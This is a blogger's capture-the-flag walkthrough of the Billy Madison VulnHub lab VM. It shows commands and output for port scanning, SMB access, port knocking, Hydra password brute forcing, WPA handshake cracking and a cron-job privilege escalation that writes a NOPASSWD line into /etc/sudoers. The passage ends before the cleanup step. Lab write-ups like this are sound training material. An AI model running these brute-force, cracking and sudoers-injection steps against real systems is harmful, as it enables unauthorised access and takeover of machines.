I was feeling like dusting off my 1337h4x sk1llz. Cause I quit my job I haven’t been actively tinkering with computers anymore and my hands were itching for a challenge. So I hopped on the Interwebs in search of some CTF action and came across the gem: https://www.vulnhub.com/entry/billy-madison-11,161/
Name: Billy Madison: 1.1
Date release: 14 Sep 2016
Author: Brian Johnson
Series: Billy Madison
Web page: https://7ms.us/billymadison/
It was a bit tricky to get through for me and my crappy linux skills. I did not want to use walkthroughs unless absolutely necessary, but thanks to Google, Github and whatnot and a couple of helpful tips from Brian @7MinSec I got through it alright.
Oh, and I wrote a tool for lulz to encrypt, decrypt or brute-force ROT-ciphers in Python which I’ll maybe post later on (once I’m happy with how it works overall)
Anywho, back to the VM. Let’s get cracking!
Side-note: The VM was hosted on ESX 6 and this was all pwned using Kali 2016.2
Plot: Help Billy Madison stop Eric from taking over Madison Hotels!
Sneaky Eric Gordon has installed malware on Billy’s computer right before the two of them are set to face off in an academic decathlon. Unless Billy can regain control of his machine and decrypt his 12th grade final project, he will not graduate from high school. Plus, it means Eric wins, and he takes over as head of Madison Hotels!
Objective: The primary objective of the VM is to figure out how Eric took over the machine and then undo his changes so you can recover Billy’s 12th grade final project. You will probably need to root the box to complete this objective.
So it begins!
# Samba! Samba de Server Message Block!
Fire up the Hydra!
Flaming bag of Aircrack-ng
Last stop on the list: SMTP
The (back)gates are open
Time to PWN!!1!
Cleaning up for Billy
So it begins!
Ok, the VM presents me with a login screen! Good, it boots:
Ubuntu 16.04.1 LTS BM tty1 BM Login:
Who dis? Info gathering.
Let’s go for some broad-spectrum intel gathering.
nmap -p 1-65535 -T4 -A -v -Pn 192.168.1.16 Starting Nmap 7.00 ( https://nmap.org ) at 2016-09-26 20:49 W. Europe Daylight Time NSE: Loaded 132 scripts for scanning. NSE: Script Pre-scanning. Initiating NSE at 20:49 Completed NSE at 20:49, 0.00s elapsed Initiating NSE at 20:49 Completed NSE at 20:49, 0.00s elapsed Initiating ARP Ping Scan at 20:49 Scanning 192.168.1.16 [1 port] Completed ARP Ping Scan at 20:49, 0.04s elapsed (1 total hosts) Initiating Parallel DNS resolution of 1 host. at 20:49 Completed Parallel DNS resolution of 1 host. at 20:49, 0.00s elapsed Initiating SYN Stealth Scan at 20:49 Scanning BM.fritz.box (192.168.1.16) [65535 ports] Discovered open port 23/tcp on 192.168.1.16 Discovered open port 22/tcp on 192.168.1.16 Discovered open port 139/tcp on 192.168.1.16 Discovered open port 80/tcp on 192.168.1.16 Discovered open port 445/tcp on 192.168.1.16 SYN Stealth Scan Timing: About 23.25% done; ETC: 20:51 (0:01:42 remaining) SYN Stealth Scan Timing: About 59.15% done; ETC: 20:51 (0:00:42 remaining) Discovered open port 2525/tcp on 192.168.1.16 Discovered open port 69/tcp on 192.168.1.16 Completed SYN Stealth Scan at 20:50, 88.47s elapsed (65535 total ports) Initiating Service scan at 20:50 Scanning 7 services on BM.fritz.box (192.168.1.16) Completed Service scan at 20:51, 23.50s elapsed (7 services on 1 host) Initiating OS detection (try #1) against BM.fritz.box (192.168.1.16) NSE: Script scanning 192.168.1.16. Initiating NSE at 20:51 Completed NSE at 20:51, 40.04s elapsed Initiating NSE at 20:51 Completed NSE at 20:51, 0.00s elapsed Nmap scan report for BM.fritz.box (192.168.1.16) WARNING: RST from 192.168.1.16 port 23 -- is this port really open? WARNING: RST from 192.168.1.16 port 23 -- is this port really open? WARNING: RST from 192.168.1.16 port 23 -- is this port really open? WARNING: RST from 192.168.1.16 port 23 -- is this port really open? WARNING: RST from 192.168.1.16 port 23 -- is this port really open? WARNING: RST from 192.168.1.16 port 23 -- is this port really open? Host is up (0.000027s latency). Not shown: 65526 filtered ports PORT STATE SERVICE VERSION 22/tcp open tcpwrapped 23/tcp open telnet? 69/tcp open http BaseHTTPServer |_http-generator: WordPress 1.0 | http-methods: |_ Supported Methods: HEAD GET POST OPTIONS |_http-server-header: MadisonHotelsWordpress |_http-title: Welcome | Just another WordPress site 80/tcp open http Apache httpd 2.4.18 ((Ubuntu)) | http-methods: |_ Supported Methods: GET HEAD POST OPTIONS |_http-server-header: Apache/2.4.18 (Ubuntu) |_http-title: Oh nooooooo! 137/tcp closed netbios-ns 138/tcp closed netbios-dgm 139/tcp open netbios-ssn Samba smbd 3.X (workgroup: BM) 445/tcp open netbios-ssn Samba smbd 3.X (workgroup: BM) 2525/tcp open smtp | smtp-commands: BM, 8BITMIME, AUTH LOGIN, Ok, |_ SubEthaSMTP null on BM Topics: HELP HELO RCPT MAIL DATA AUTH EHLO NOOP RSET VRFY QUIT STARTTLS For more info use "HELP ". End of HELP info 2 services unrecognized despite returning data. If you know the service/version, please submit the following fingerprints at https://nmap.org/cgi-bin/submit.cgi?new-service : ==============NEXT SERVICE FINGERPRINT (SUBMIT INDIVIDUALLY)============== SF-Port23-TCP:V=7.00%I=7%D=9/30%Time=57EEB40C%P=i686-pc-windows-windows%r( SF:NULL,E6,"\n\n\*\*\*\*\*\x20HAHAH!\x20You're\x20banned\x20for\x20a\x20wh SF:ile,\x20Billy\x20Boy!\x20\x20By\x20the\x20way,\x20I\x20caught\x20you\x2 SF:0trying\x20to\x20hack\x20my\x20wifi\x20-\x20but\x20the\x20joke's\x20on\ SF:x20you!\x20I\x20don't\x20use\x20ROTten\x20passwords\x20like\x20rkfpuzra SF:hngvat\x20anymore!\x20Madison\x20Hotels\x20is\x20as\x20good\x20as\x20MI SF:NE!!!!\x20\*\*\*\*\*\n\n"); ==============NEXT SERVICE FINGERPRINT (SUBMIT INDIVIDUALLY)============== SF-Port2525-TCP:V=7.00%I=7%D=9/30%Time=57EEB412%P=i686-pc-windows-windows% SF:r(NULL,1F,"220\x20BM\x20ESMTP\x20SubEthaSMTP\x20null\r\n")%r(GetRequest SF:,5A,"220\x20BM\x20ESMTP\x20SubEthaSMTP\x20null\r\n500\x20Error:\x20comm SF:and\x20not\x20implemented\r\n500\x20Error:\x20bad\x20syntax\r\n")%r(Gen SF:ericLines,4D,"220\x20BM\x20ESMTP\x20SubEthaSMTP\x20null\r\n500\x20Error SF::\x20bad\x20syntax\r\n500\x20Error:\x20bad\x20syntax\r\n")%r(Help,13D," SF:220\x20BM\x20ESMTP\x20SubEthaSMTP\x20null\r\n214-SubEthaSMTP\x20null\x2 SF:0on\x20BM\r\n214-Topics:\r\n214-\x20\x20\x20\x20\x20HELP\r\n214-\x20\x2 SF:0\x20\x20\x20HELO\r\n214-\x20\x20\x20\x20\x20RCPT\r\n214-\x20\x20\x20\x SF:20\x20MAIL\r\n214-\x20\x20\x20\x20\x20DATA\r\n214-\x20\x20\x20\x20\x20A SF:UTH\r\n214-\x20\x20\x20\x20\x20EHLO\r\n214-\x20\x20\x20\x20\x20NOOP\r\n SF:214-\x20\x20\x20\x20\x20RSET\r\n214-\x20\x20\x20\x20\x20VRFY\r\n214-\x2 SF:0\x20\x20\x20\x20QUIT\r\n214-\x20\x20\x20\x20\x20STARTTLS\r\n214-For\x2 SF:0more\x20info\x20use\x20\"HELP\x20\"\.\r\n214\x20End\x20of\x20HE SF:LP\x20info\r\n"); MAC Address: 00:0C:29:A5:98:2F (VMware) Device type: general purpose Running: OpenBSD 4.X OS CPE: cpe:/o:openbsd:openbsd:4.4 OS details: OpenBSD 4.4 Network Distance: 1 hop Host script results: | smb-os-discovery: | OS: Windows 6.1 (Samba 4.3.9-Ubuntu) | Computer name: bm | NetBIOS computer name: BM | Domain name: | FQDN: bm |_ System time: 2016-09-26T13:51:33-05:00 | smb-security-mode: | account_used: guest | authentication_level: user | challenge_response: supported |_ message_signing: disabled (dangerous, but default) |_smbv2-enabled: Server supports SMBv2 protocol TRACEROUTE HOP RTT ADDRESS 1 0.03 ms BM.fritz.box (192.168.1.16) NSE: Script Post-scanning. Initiating NSE at 20:51 Completed NSE at 20:51, 0.00s elapsed Initiating NSE at 20:51 Completed NSE at 20:51, 0.00s elapsed Read data files from: F:\Program Files (x86)\Nmap OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 155.41 seconds Raw packets sent: 131162 (5.774MB) | Rcvd: 86 (3.656KB)
So we have Telnet, SSH, HTTP on 69 and 80, SMB, SMTP on 2525
ncat -v 192.168.1.16 23 Ncat: Version 7.25BETA2 ( https://nmap.org/ncat ) Ncat: Connected to 192.168.1.16:23. ***** HAHAH! You're banned for a while, Billy Boy! By the way, I caught you trying to hack my wifi - but the joke's on you! I don't use ROTten passwords like rkfpuzrahngvat anymore! Madison Hotels is as good as MINE!!!! *****
OH ERIC U FUNNY! But the ROT10 is a password and might lead further. So I find me a ROT tool online and stumble across a way to do it with ‘tr’
ROT-1 = tr 'b-za-aB-ZA-A' 'a-zA-Z' ROT-2 = tr 'c-za-bC-ZA-B' 'a-zA-Z' ROT-3 = tr 'd-za-cD-ZA-C' ‘a-zA-Z’ etc. etc.
But I dunno what I’m looking for exactly so I want a wordlist with all possibilities. For now I have a list from the web, but this would be relatively easy to make and I was looking to do something useful in Python. And that’s how my c1ph3r.py tool was born.
qjeotyqzgmfuzs pidnsxpyfletyr ohcmrwoxekdsxq ngblqvnwdjcrwp mfakpumvcibqvo lezjotlubhapun kdyinsktagzotm jcxhmrjszfynsl ibwglqiryexmrk havfkphqxdwlqj gzuejogpwcvkp fytdinfovbujoh exschmenuating dwrbgldmtzshmf cvqafkclsyrgle bupzejbkrxqfkd atoydiajqwpejc zsnxchzipvodib yrmwbgyhouncha xqlvafxgntmbgz wpkuzewfmslafy vojtydvelrkzex unisxcudkqjydw tmhrwbtcjpixcv slgqvasbiohwbu rkfpuzrahngvat
ssh 192.168.1.16 ssh_exchange_identification: Connection refused by remote host
No dice. Probably something monitoring the port too.
# WordPress 1.0 on :69
Since the WP version is from the Dark Ages let’s see what we can find with running the WordPress Security Scanner against it and see what’s what.
wpscan --url http://192.168.1.16:69/ _______________________________________________________________ __ _______ _____ \ \ / / __ \ / ____| \ \ /\ / /| |__) | (___ ___ __ _ _ __ \ \/ \/ / | ___/ \___ \ / __|/ _` | '_ \ \ /\ / | | ____) | (__| (_| | | | | \/ \/ |_| |_____/ \___|\__,_|_| |_| WordPress Security Scanner by the WPScan Team Version 2.9.1 Sponsored by Sucuri - https://sucuri.net @_WPScan_, @ethicalhack3r, @erwan_lr, pvdl, @_FireFart_ _______________________________________________________________ The plugins directory 'wp-content/plugins' does not exist. You can specify one per command line option (don't forget to include the wp-content directory if needed) [?] Continue? [Y]es [N]o, default: [N] Y [+] URL: http://192.168.1.16:69/ [+] Started: Sat Sep 10 22:56:29 2016 [!] The WordPress 'http://192.168.1.16:69/readme.html' file exists exposing a version number [+] Interesting header: SERVER: MadisonHotelsWordpress [+] XML-RPC Interface available under: http://192.168.1.16:69/xmlrpc.php [+] WordPress version 1.0 identified from meta generator (Released on 2004-01-03) [+] WordPress theme in use: twentyeleven [+] Name: twentyeleven | Latest version: 2.5 | Location: http://192.168.1.16:69/wp-content/themes/twentyeleven/ | Readme: http://192.168.1.16:69/wp-content/themes/twentyeleven/readme.txt | Changelog: http://192.168.1.16:69/wp-content/themes/twentyeleven/changelog.txt | Style URL: http://192.168.1.16:69/wp-content/themes/twentyeleven/style.css | Referenced style.css: http://192.168.1.16:69/static/wp-content/themes/twentyeleven/style.css [+] Enumerating plugins from passive detection ... [+] No plugins found [+] Finished: Sat Sep 10 22:56:29 2016 [+] Requests Done: 59 [+] Memory used: 15.312 MB [+] Elapsed time: 00:00:00
Nothing special. Enumerating the users via /?author=1 /?author=2 I can only find 1 account: admin. Noted. This smells funny though. Nothing from my ROT-list works here. Doesn’t really look promising so I’ll move on for now to webservice number 2
# Apache on :80
So visiting the webpage renders a funny defaced site. Silly Billy!!! Eric has no love for Billy.
“Good luck, schmuck.”
So I check the page and see nothing special in code or in the images. Let’s fuzz the site with the ROT10 list.
wfuzz -c -w /root/hacking/BM/ROT.wls --hc=404 http://192.168.1.13/FUZZ ******************************************************** * Wfuzz 2.1.3 - The Web Bruteforcer * ******************************************************** Target: http://192.168.1.13/FUZZ Total requests: 26 ================================================================== ID Response Lines Word Chars Request ================================================================== 00015: C=301 9 L 28 W 321 Ch "exschmenuating" Total time: 0.110656 Processed Requests: 26 Filtered Requests: 25 Requests/sec.: 234.960
SHWEET! The site “exschmenuating” was found. Visiting http://192.168.1.16/exschmenuating renders a page with “Ruin Billy Madison’s Life” – Eric’s notes. And also a link to http://192.168.1.13/exschmenuating/currently-banned-hosts.txt which lists my host as blocked.
--- 2016-09-30-15-10-01 Hosts currently banned Chain INPUT (policy DROP) DROP all -- 192.168.1.25 anywhere --- If your IP appears in this list it has been banned, and you will need to reset this host to lift the ban. Otherwise, further efforts to connect to this host may produce false positives or refuse connections altogether. ---
Senpai has noticed me. No worries, I’ll change my ifconfig-ables once I go attack-mode.
Another interesting bit of info is the 08/03/16 entry:
08/03/16 OMg LOL LOL LOL!!! What a twit - I can't believe she fell for it!! I .captured the whole thing in this folder for later lulz. I put "veronica" somewhere in the file name because I bet you a million dollars she uses her name as part of her passwords - if that's true, she rocks! Anyway, malware installation successful. I'm now in complete control of Bill's machine!
Thank you, Eric – for putting a .cap file on here with Veronica’s name in there.
First – make a wordlist to use with dirbuster to find the .cap (maybe .pcap). As a source I’m gonna use one of the largest standard included wordlists in Kali: rockyou.txt.
grep veronica /usr/share/wordlist/rockyou.txt > veronica.wls
Next – I throw the thing into dirbuster (GUI) to look for a *veronica* named .cap or .pcap file, aaaaaand bingo: 012987veronica.cap found!
After downloading “012987veronica.cap” and filtering out the TCP streams in Wireshark you’ll find several e-mails detailing how Eric pwns Veronica through a little bit of ‘Social Engineering’.
The most important emails refer to a “Spanish Armada” combo and contain FTP credentials for Eric
Eric, Thanks for your message. I tried to download that file but my antivirus blocked it. Could you just upload it directly to us via FTP? We keep FTP turned off unless someone connects with the "Spanish Armada" combo. -VV . QUIT ========================================================= EHLO kali MAIL FROM:<email@example.com> RCPT TO:<firstname.lastname@example.org> DATA Date: Sat, 20 Aug 2016 21:57:11 -0500 To: email@example.com From: firstname.lastname@example.org Subject: test Sat, 20 Aug 2016 21:57:11 -0500 X-Mailer: swaks v20130209.0 jetmore.org/john/code/swaks/ RE: VIRUS ALERT! Veronica, Thanks that will be perfect. Please set me up an account with username of "eric" and password "ericdoesntdrinkhisownpee." -Eric . QUIT
So Billys got a thing for numbers, huh? The youtube video references a sequence of years/numbers after the words Spanish Armada: 1466 67 1469 1514 1981 1986.
Eric clearly doesn’t have a thing for pee.
Last I checked no FTP port was open. Let’s check SMB first before I dig into FTP.
# Samba! Samba de Server Message Block! https://www.youtube.com/watch?v=Bx1iclqbNyM
Ah SMB. CIFS. Very familiar stuff – let’s check for shares.
smbmap -H 192.168.1.16 [+] Finding open SMB ports.... [+] Guest SMB session established on 192.168.1.6... [+] IP: 192.168.1.16:445 Name: BM.fritz.box Disk Permissions ---- ----------- EricsSecretStuff READ ONLY IPC$ NO ACCESS
nmap told us a guest account was used to check so let’s connect anonymously.
smbclient -N //192.168.1.16/EricsSecretStuff WARNING: The "syslog" option is deprecated Domain=[WORKGROUP] OS=[Windows 6.1] Server=[Samba 4.3.9-Ubuntu] smb: \> ls . D 0 Sat Sep 10 23:27:10 2016 .. D 0 Sat Aug 20 14:56:45 2016 ._.DS_Store AH 4096 Wed Aug 17 10:32:07 2016 ebd.txt N 35 Sat Sep 10 23:27:10 2016 .DS_Store AH 6148 Wed Aug 17 10:32:12 2016 30291996 blocks of size 1024. 25800892 blocks available smb: \>
Noice. Get teh supplies. Drop teh supplies.
smb: \> mget *.* Get file ._.DS_Store? y getting file \._.DS_Store of size 4096 as ._.DS_Store (1999.9 KiloBytes/sec) (average 475.8 KiloBytes/sec) Get file ebd.txt? y getting file \ebd.txt of size 35 as ebd.txt (17.1 KiloBytes/sec) (average 469.1 KiloBytes/sec) Get file .DS_Store? y getting file \.DS_Store of size 6148 as .DS_Store (3001.8 KiloBytes/sec) (average 505.5 KiloBytes/sec) smb: \> exit< root@kali:~/hacking/BM# cat ebd.txt Erics backdoor is currently CLOSED
So there’s a monitored backdoor. With the sequence and all that sounds like a port knock to me.
Let’s try a port knocking sequence with the Spanish Armada numbers as ports.
for K in 1466 67 1469 1514 1981 1986; do nmap -Pn --max-retries 0 -p $K 192.168.1.16; done
After all packets are sent do a scan to see if the port is up.
nmap -Pn -p 21 -A 192.168.1.16 Starting Nmap 7.25BETA2 ( https://nmap.org ) at 2016-09-30 23:24 CEST Nmap scan report for 192.168.1.16 Host is up (0.00046s latency). PORT STATE SERVICE VERSION 21/tcp open ftp | ftp-anon: Anonymous FTP login allowed (FTP code 230) |_Can't get directory listing: TIMEOUT |_ftp-bounce: bounce working!
Fantastic! Anonymous login is also allowed. So let’s start there.
ftp 192.168.1.16 Connected to 192.168.1.16. 220 Welcome to ColoradoFTP - the open source FTP server (www.coldcore.com) Name (192.168.1.16:root): anonymous 331 Guest login okay, send your complete e-mail address as password. Password: 230 User logged in, proceed. Remote system type is UNIX. ftp> ls 200 PORT command successful. 150 Opening A mode data connection for /. -rwxrwxrwx 1 ftp 141 Aug 15 09:19 Billys-12th-grade-final-project.doc 226 Transfer completed. ftp> get Billys-12th-grade-final-project.doc local: Billys-12th-grade-final-project.doc remote: Billys-12th-grade-final-project.doc 200 PORT command successful. 150 Opening A mode data connection for Billys-12th-grade-final-project.doc. 226 Transfer completed for "Billys-12th-grade-final-project.doc". 145 bytes received in 0.25 secs (0.5690 kB/s) ftp> quit 221 Logged out, closing control connection. cat Billys-12th-grade-final-project.doc HHAHAAHAHAH I CAN'T BELIEVE YOU ACTUALLY THOUGHT THIS WAS IT!!!! WHAT A LOSER! Why don't you go pass out by the pool for another hour! -EG
Let’s move on to Eric’s FTP. login with user “eric” and password “ericdoesntdrinkhisownpee”
ftp> ls -lah 200 PORT command successful. 150 Opening A mode data connection for /. -rwxrwxrwx 1 ftp 6326 Aug 20 12:49 40049 -rwxrwxrwx 1 ftp 5367 Aug 20 12:49 39772 -rwxrwxrwx 1 ftp 868 Sep 01 10:42 .notes -rwxrwxrwx 1 ftp 5208 Aug 20 12:49 39773 -rwxrwxrwx 1 ftp 1287 Aug 20 12:49 9129 -rwxrwxrwx 1 ftp 9132 Aug 20 12:49 40054 226 Transfer completed.
I mget all of these files and start digging.
First of all I check out the content of the .notes file.
cat .notes Ugh, this is frustrating. I managed to make a system account for myself. I also managed to hide Billy's paper where he'll never find it. However, now I can't find it either :-(. To make matters worse, my privesc exploits aren't working. One sort of worked, but I think I have it installed all backwards. If I'm going to maintain total control of Billy's miserable life (or what's left of it) I need to root the box and find that paper! Fortunately, my SSH backdoor into the system IS working. All I need to do is send an email that includes the text: "My kid will be a ________ _________" Hint: https://www.youtube.com/watch?v=6u7RsW5SAgs The new secret port will be open and then I can login from there with my wifi password, which I'm sure Billy or Veronica know. I didn't see it in Billy's FTP folders, but didn't have time to check Veronica's. -EG
The answer is soccer player. It’s clear we need to send him an e-mail with the body and header “My kid will be a soccer player” to open Eric’s SSH backdoor. We’ll get to SMTP soon enough. The other files provide background info on the exploit and how you can try and use it. But first I wanna hack all the things so I reckon there are accounts for Billy and Veronica. Let’s start with Veronica and let’s also assume her name is in the password.
Fire up the Hydra!
hydra -l veronica -P veronica.wls ftp://192.168.1.16 Hydra v8.2 (c) 2016 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes. Hydra (http://www.thc.org/thc-hydra) starting at 2016-09-28 20:14:27 [WARNING] Restorefile (./hydra.restore) from a previous session found, to prevent overwriting, you have 10 seconds to abort... [DATA] max 16 tasks per 1 server, overall 64 tasks, 773 login tries (l:1/p:773), ~0 tries per task [DATA] attacking service ftp on port 21 [ftp] host: 192.168.1.13 login: veronica password: email@example.com 1 of 1 target successfully completed, 1 valid password found Hydra (http://www.thc.org/thc-hydra) finished at 2016-09-28 20:14:56
Yup, we were right. First we get cookies and chill because: easy h4x, easy life. Then we login with her creds.
The first time I logged in and pulled all her files the .cap file was corrupt. Asked myself: by design or else? I looked the the file with a Hex Editor. That didn’t help – but it did get me the ESSID: EricGordon. Turns out I had not thought to set the mode to BINARY!! Cheers, Brian \^^/
ftp> binary 200 Type set to I ftp> ls -lah 200 PORT command successful. 150 Opening A mode data connection for /. -rwxrwxrwx 1 ftp 719128 Aug 17 12:16 eg-01.cap -rwxrwxrwx 1 ftp 595 Aug 20 12:55 email-from-billy.eml 226 Transfer completed. ftp>
I mget all of her files. Let start checking out the e-mail from Billy:
cat email-from-billy.eml Sat, 20 Aug 2016 12:55:45 -0500 (CDT) Date: Sat, 20 Aug 2016 12:55:40 -0500 To: firstname.lastname@example.org From: email@example.com Subject: test Sat, 20 Aug 2016 12:55:40 -0500 X-Mailer: swaks v20130209.0 jetmore.org/john/code/swaks/ Eric's wifi Hey VV, It's your boy Billy here. Sorry to leave in the middle of the night but I wanted to crack Eric's wireless and then mess with him. I wasn't completely successful yet, but at least I got a start. I didn't walk away without doing my signature move, though. I left a flaming bag of dog poo on his doorstep. :-) Kisses, Billy
I also started a hydra session for billy but with a big wordlist and the amount of tasks I was limited to, gave up in persuit of r00t.
Dirty Billy left a bag of flaming poo and captured eg-01.cap which contains EricGordon’s password. Good times all around. Let’s crack!
Flaming bag of Aircrack-ng
Using the same wordlist I put aircrack-ng to work on the .cap
aircrack-ng -a 2 -e EricGordon -w /usr/share/wordlists/rockyou.txt eg-01.capOpening eg-01.cap Read 13003 packets. Opening eg-01.cap Reading packets, please wait... Aircrack-ng 1.2 rc4 [00:05:09] 1699636/9822768 keys tested (5674.90 k/s) Time left: 23 minutes, 51 seconds 17.30% KEY FOUND! [ triscuit* ] Master Key : 9E 8B 4F E6 CC 5E E2 4C 46 84 D2 AF 59 4B 21 6D B5 3B 52 84 04 9D D8 D8 83 67 AF 43 DC 60 CE 92 Transient Key : 7A FA 82 59 5A 9A 23 6E 8C FB 1D 4B 4D 47 BE 13 D7 AC AC 4C 81 0F B5 A2 EE 2D 9F CC 8F 05 D2 82 BF F4 4E AE 4E C9 ED EA 31 37 1E E7 29 10 13 92 BB 87 8A AE 70 95 F8 62 20 B5 2B 53 8D 0C 5C DC EAPOL HMAC : 86 63 53 4B 77 52 82 0C 73 4A FA CA 19 79 05 33
So the login creds for the SSH:1974 backdoor will be user “eric” with password “triscuit*”
Last stop on the list: SMTP. The key
EHLO friend. We’re gonna make Eric send himself a mail with “My kid will be a soccer player” in the body and header to activate his SSH backdoor.
You can do this via telnet and punch in the commands yourself or use swaks
swaks -t firstname.lastname@example.org -f email@example.com -s 192.168.1.16:2525 --body "My kid will be a soccer player" --header "Subject: My kid will be a soccer player" === Trying 192.168.1.13:2525... === Connected to 192.168.1.13. EHLO kali MAIL FROM:<firstname.lastname@example.org> RCPT TO:<email@example.com> DATA . -> Date: Sat, 01 Oct 2016 01:36:59 +0200 -> To: firstname.lastname@example.org -> From: email@example.com -> Subject: My kid will be a soccer player -> X-Mailer: swaks v20130209.0 jetmore.org/john/code/swaks/ -> -> My kid will be a soccer player -> -> . QUIT
So now the SSH backdoor should be open. Let’s do another scan.
1974/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.1 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 2048 f2:02:a4:3b:8f:84:a2:fd:28:53:e5:2d:a2:63:90:48 (RSA) |_ 256 31:60:85:b5:93:da:92:9e:90:a2:d0:a7:c4:51:42:8e (ECDSA)
The (back)gates are open
Let’s see what Eric has been up to here – saving Madison Hotels from certain doom and retrieve Billy’s homework.
ssh -p 1974 firstname.lastname@example.org email@example.com's password: Welcome to Ubuntu 16.04.1 LTS (GNU/Linux 4.4.0-36-generic x86_64) * Documentation: https://help.ubuntu.com * Management: https://landscape.canonical.com * Support: https://ubuntu.com/advantage 37 packages can be updated. 0 updates are security updates. Last login: Sat Aug 20 22:28:28 2016 from 192.168.3.105 eric@BM:~$
Great success! Lets have a look at what Eric keeps in his home folder.
eric@BM:~$ ls -lah total 532K drwxr-xr-x 3 eric eric 4.0K Aug 23 00:18 . drwxr-xr-x 6 root root 4.0K Aug 20 13:56 .. -rw-r--r-- 1 eric eric 220 Aug 20 13:56 .bash_logout -rw-r--r-- 1 eric eric 3.7K Aug 20 13:56 .bashrc drwx------ 2 eric eric 4.0K Aug 20 14:07 .cache -rw-r--r-- 1 root root 441K Aug 7 22:31 eric-tongue-animated.gif -rw-r--r-- 1 root root 60K Aug 7 22:29 eric-unimpressed.jpg -rw-r--r-- 1 eric eric 655 Aug 20 13:56 .profile -rw-r--r-- 1 root root 115 Aug 20 20:41 why-1974.txt eric@BM:~$ cat why-1974.txt Why 1974? Because: http://www.metacafe.com/watch/an-VB9KuJtnh4bn/billy_madison_1995_billy_hangs_out_with_friends/
We’ve got a reason for the portnumber and some pics. I quickly scp’ed them to storage elsewhere for safekeeping and documentation.
Time to PWN!!1!
The documentation and code Eric used for sploiting Billys machine references a vulnerabilty to mess with the reference count of the struct file and will allow us to write data to a read-only file. The exploit will create a writable file descriptor, start a write operation on it, wait for the kernel to verify the file’s writability, then free the writable file and open a read-only file that is allocated in the same place before the kernel writes into the freed file, allowing an attacker to possibly obtain r00t by writing a cron-job.
Ok, now – how do we look for this? After sleeping on it for a night and reading up on some things I settled on the logic that the eric must have gotten file owner’s permissions as well as owner UID and GID when executing the exploit. Now if this occurs in a folder he normally does not have those rights too they will be elevated with SUID permissions.
Let’s have a find.
eric@BM:~$ find / -user root -perm -4000 -ls 2>/dev/null 1454477 368 -r-sr-s--- 1 root eric 372922 Aug 20 22:35 /usr/local/share/sgml/donpcgd 1048829 136 -rwsr-xr-x 1 root root 136808 May 4 12:25 /usr/bin/sudo 1058216 24 -rwsr-xr-x 1 root root 23376 Jan 17 2016 /usr/bin/pkexec 1048745 56 -rwsr-xr-x 1 root root 54256 Mar 29 04:25 /usr/bin/passwd 1057557 36 -rwsr-xr-x 1 root root 32944 Mar 29 04:25 /usr/bin/newgidmap 1048609 40 -rwsr-xr-x 1 root root 40432 Mar 29 04:25 /usr/bin/chsh 1048670 76 -rwsr-xr-x 1 root root 75304 Mar 29 04:25 /usr/bin/gpasswd 1057558 36 -rwsr-xr-x 1 root root 32944 Mar 29 04:25 /usr/bin/newuidmap 1048734 40 -rwsr-xr-x 1 root root 39904 Mar 29 04:25 /usr/bin/newgrp 1048607 52 -rwsr-xr-x 1 root root 49584 Mar 29 04:25 /usr/bin/chfn 1058246 24 -rwsr-xr-x 1 root root 23288 Apr 29 11:02 /usr/bin/ubuntu-core-launcher 1048930 12 -rwsr-xr-x 1 root root 10240 Feb 25 2014 /usr/lib/eject/dmcrypt-get-device 1057498 40 -rwsr-xr-x 1 root root 38984 Jun 30 02:28 /usr/lib/x86_64-linux-gnu/lxc/lxc-user-nic 1318420 16 -rwsr-xr-x 1 root root 14864 Jan 17 2016 /usr/lib/policykit-1/polkit-agent-helper-1 1066069 420 -rwsr-xr-x 1 root root 428240 Aug 11 11:25 /usr/lib/openssh/ssh-keysign 1056767 44 -rwsr-xr-- 1 root messagebus 42992 Apr 1 11:41 /usr/lib/dbus-1.0/dbus-daemon-launch-helper 1179709 40 -rwsr-xr-x 1 root root 40152 May 26 18:31 /bin/mount 1179740 40 -rwsr-xr-x 1 root root 40128 Mar 29 04:25 /bin/su 1179758 28 -rwsr-xr-x 1 root root 27608 May 26 18:31 /bin/umount 1190647 32 -rwsr-xr-x 1 root root 30800 Mar 11 2016 /bin/fusermount 1179724 44 -rwsr-xr-x 1 root root 44680 May 7 2014 /bin/ping6 1179723 44 -rwsr-xr-x 1 root root 44168 May 7 2014 /bin/ping 1190681 140 -rwsr-xr-x 1 root root 142032 Feb 17 2016 /bin/ntfs-3g
Enemy spotted: /usr/local/share/sgml/donpcgd runs as root.
eric@BM:~$ /usr/local/share/sgml/donpcgd Usage: /usr/local/share/sgml/donpcgd path1 path2
I want to make Eric a sudoer. First I try to manipulate crontab as is directly stated in the documentation, but I fail at that. So I pick cron.hourly and try an make an empty file there which I will put a script in to edit /etc/sudoers
eric@BM:/tmp$ touch elevate eric@BM:/tmp$ /usr/local/share/sgml/donpcgd /tmp/elevate /etc/cron.hourly/pwn #### mknod(/etc/cron.hourly/pwn,81b4,0) eric@BM:/tmp$ echo -e '#!/bin/bash\necho "eric ALL=(ALL) NOPASSWD:ALL" >> /etc/sudoers' > /etc/cron.hourly/pwn eric@BM:/tmp$ chmod +x /etc/cron.hourly/pwn eric@BM:/tmp$ cat /etc/cron.hourly/pwn #!/bin/bash echo "eric ALL=(ALL) NOPASSWD:ALL" >> /etc/sudoers
Now we wait a little. Play a game. Eat a cookie.
eric@BM:~$ sudo su root@BM:/home/eric# root@BM:/home/eric# id uid=0(root) gid=0(root) groups=0(root)
B0w t0 me, f0r I am r00t!
In order to complete the VM we need to clean up Eric’s mess and find Billy’s paper. So I’m just gonna root through everything and see what pops up. First lets look around for interesting stuff.
